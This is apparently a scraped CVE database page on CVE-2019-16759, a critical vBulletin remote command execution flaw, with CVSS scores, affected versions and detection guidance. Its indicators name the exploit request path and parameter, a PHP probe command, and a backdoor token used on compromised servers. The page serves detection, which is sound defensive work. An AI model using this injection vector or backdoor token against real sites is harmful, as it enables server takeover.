cbcvebase.
CVE-2019-16759
published 2019-09-24

CVE-2019-16759: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.73%
100.0th percentile
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

Affected

2 ranges
VendorProductVersion rangeFixed in
vbulletinvbulletin5.0.0 – 5.5.4
vbulletinvbulletin5.5.4 – 5.6.2

Detection & IOCsextracted from sources · hover to see the quote

url/index.php?routestring=ajax/render/widget_php
pathajax/render/widget_php
otherepass=2dmfrb28nu3c6s9j
pathincludes/vb5/frontend/controller/bbcode.php
commanddie(@md5(HellovBulletin))
otherThreat Prevention Signature 56632
otherThreat Prevention Signature 56627
  • Detect POST requests to /index.php with routestring parameter set to 'ajax/render/widget_php' — this is the canonical exploit path for CVE-2019-16759.
  • Inspect POST body for the 'widgetConfig[code]' parameter containing PHP code or shell_exec calls, which is the injection vector for this SSTI/RCE.
  • Monitor for unauthorized modifications to bbcode.php (includes/vb5/frontend/controller/bbcode.php); attackers overwrote this file to implant a backdoor gated by the 'epass' request parameter.
  • Detect HTTP requests containing the 'epass' parameter with value '2dmfrb28nu3c6s9j', which is the C2 backdoor authentication token implanted in compromised vBulletin instances.
  • Check Point IPS blade signature name 'vBulletin Forum Remote Code Execution (CVE-2019-16759)' can be used as a reference for IPS/IDS rule naming and tuning.
  • ·The vulnerability only triggers when PHP rendering is enabled in vBulletin's administration panel; disabling PHP, Static HTML, and Ad Module rendering mitigates the attack without patching.
  • ·CVE-2020-7373 (vBulletin 5.5.4–5.6.2 via subWidgets/widget_tabbedcontainer_tab_panel) is an incomplete fix bypass of CVE-2019-16759; detections for the original CVE may not cover this variant.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.